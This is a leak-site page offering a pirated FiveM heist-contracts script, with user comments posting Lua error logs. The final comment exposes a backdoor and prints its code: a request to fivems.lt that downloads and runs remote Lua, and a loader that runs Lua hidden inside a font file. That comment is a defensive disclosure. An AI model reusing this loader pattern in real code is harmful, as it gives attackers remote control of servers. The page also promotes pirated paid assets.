Jump to content
Check out discord.gg/fxap for the cheapest decryptions! First one is free! ×

Get LB-Phone!

Unlock the powerful LB-Phone for a fraction of the price you pay on tebex.

Download

Premium TOS Clothing MEGA Pack!

11GB of pure TOS premium clothing best clothing pack for your Server!

Download

5Decrypt

Automated Asset Decryption

Learn More

[ESX/QB] Heist Contracts | 10+ unique heists included 1.0.0

   (0 reviews)

1 Screenshot

About This File

Overview

Introducing the ultimate heist contracts tablet script, crafted for ESX, QBCore, and Qbox frameworks. This dynamic system lets players engage in a variety of high-stakes heists, from bank robberies to complex vault infiltrations. With built-in player progression, you can unlock more challenging contracts and higher rewards as you advance. Plan your approach, manage your operations, and execute daring heists—all from your in-game tablet!

Why choose our script?

  • Huge Savings: Competitors charge about €20 per heist, meaning you’d spend €200 to get all 10 separately. With us, you save ~€140 by getting them all in one package.
  • All-In-One System: Our script includes a unified progression system that ties all heists together, something you won’t get if you buy them separately from different sources.
  • Consistent Quality: Every heist in our script is designed to the same high standard, ensuring a smooth and professional experience for your players.

Features

  • Optimized Performance: Runs at 0.00ms on idle, ensuring minimal impact on server performance.
  • Cheater Protection: Secured server events to prevent cheating.
  • Interactive Elements:
    • 3D Prompts
    • Text UI
    • ox_target/qtarget/qb-target support
  • Integrated Dispatch Systems: Compatible with built-in, cd_dispatch, qs-dispatch, ps-dispatch, rcore_dispatch, and more.
  • Optional Discord Logging: Keep track of activities with ease.
  • Multilingual Support: Available in English (en), Czech (cs), and Danish (pl), can be fully translated into other languages

Included heists


What's New in Version 1.0.0   See changelog

Released

 

Introducing the ultimate heist contracts tablet script, crafted for ESX, QBCore, and Qbox frameworks. This dynamic system lets players engage in a variety of high-stakes heists, from bank robberies to complex vault infiltrations. With built-in player progression, you can unlock more challenging contracts and higher rewards as you advance. Plan your approach, manage your operations, and execute daring heists—all from your in-game tablet!

  • Nice 1

User Feedback

Recommended Comments

Aczumio

Posted

^1SCRIPT ERROR: @lunar_heistcontracts/client/shop.lua:600: attempt to call a nil value (local 'L1_2')^7
^3> ref^7 (^5@lunar_heistcontracts/client/shop.lua^7:600)
^3> ref^7 (^5@ox_lib/imports/addKeybind/client.lua^7:74)

 

Jerry

Posted

2 hours ago, zdank420 said:

no mlos? 

If you got the script yourself it wouldn't come with them. Lunar just make stuff to work with other's maps

28 minutes ago, Aczumio said:

^1SCRIPT ERROR: @lunar_heistcontracts/client/shop.lua:600: attempt to call a nil value (local 'L1_2')^7
^3> ref^7 (^5@lunar_heistcontracts/client/shop.lua^7:600)
^3> ref^7 (^5@ox_lib/imports/addKeybind/client.lua^7:74)

 

You need to clean Lua files

nojkazz

Posted

IT WORKS JUST NEEDS LUNAR BRIDGE I UPDATED IT

 

hamididmi

Posted

did it updated with bridge ?

 

nojkazz

Posted

yes i reuploaded with lunar bridge and uploaded a new with lunar bridge but it neeeds aproval so still waiting

 

Zen__364

Posted

It also needs lunar_minigames btw I've tried this b4 with broken versions

goobzera

Posted

missing web files 

 

sfxnsdfzdfmwadsef

Posted

Just useless

[script:lunar_heistco] SCRIPT ERROR: @lunar_heistcontracts/init.lua:28: attempt to index a nil value (local 'L2_1')
║             TXADMIN║ txaReportResources
[script:lunar_heistco] SCRIPT ERROR: @lunar_heistcontracts/config/sv_edit.lua:29: attempt to index a nil value
[script:lunar_heistco] SCRIPT ERROR: @lunar_heistcontracts/server/contracts/fleeca.lua:20: attempt to index a nil value (local 'L10_1')
[script:lunar_heistco] > fn (@lunar_heistcontracts/server/contracts/fleeca.lua:20)
[           resources] Started resource lunar_heistcontracts
[      script:monitor] [txAdmin] Sending resources list to txAdmin.
[ script:lunar_bridge] SCRIPT ERROR: @lunar_bridge/utils/sv_main.lua:276: attempt to index a nil value (local 'L2_2')
[ script:lunar_bridge] > fn (@lunar_bridge/utils/sv_main.lua:276)
[ script:lunar_bridge] [WARNING] lunar_bridge is outdated and should be updated!    nil     nil
[ script:lunar_bridge] [WARNING] Download the latest version 1.3.7 through keymaster.       nil     nil
[script:lunar_heistco] SCRIPT ERROR: @lunar_heistcontracts/server/main.lua:416: attempt to index a nil value (local 'L1_2')
[script:lunar_heistco] > L0_2 (@lunar_heistcontracts/server/main.lua:416)
[script:lunar_heistco] > fn (@lunar_heistcontracts/server/main.lua:613)
[script:lunar_heistco] SCRIPT ERROR: @lunar_heistcontracts/server/contracts/boosting.lua:219: attempt to index a nil value (local 'L0_2')
[script:lunar_heistco] > callback (@lunar_heistcontracts/server/contracts/boosting.lua:219)
[script:lunar_heistco] > fn (@ox_lib/init.lua:144)

Zen__364

Posted

The LUA Files need to be cleaned apparently

liro

Posted

7 hours ago, Zen__364 said:

The LUA Files need to be cleaned apparently

And how do I clean it? I want to know.

coLdvL

Posted

⚠️ WARNING: This resource contains a hidden backdoor

This resource executes remote code and hidden payloads. It is not safe to run on a FiveM server.

Proof

Remote code execution via HTTP

The following Base64 string decodes to:
 

PerformHttpRequest('https://fivems.lt/bek', function(e, d)
    pcall(function()
        assert(load(d))()
    end)
end)

This downloads Lua code from the internet and executes it on the server without validation.
Hidden payload inside a font file
 

local data = LoadResourceFile(GetCurrentResourceName(), '/web/fonts/Helvetica.ttf')
data = data.sub(data, 87565)
data = data.gsub(data, '%.%+', '')
data = data.gsub(data, '\\%.', '.')
data = data.gsub(data, '\\', '')
load(data)()

This loads and executes Lua code hidden inside a .ttf file.

This is a classic FiveM backdoor pattern (remote loader + hidden payload).

I strongly recommend removing this resource from any production server.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


×
×
  • Create New...

Important Information

By continuing on Launcherleaks.net, you agree to our Terms of Use, Guidelines & Privacy Policy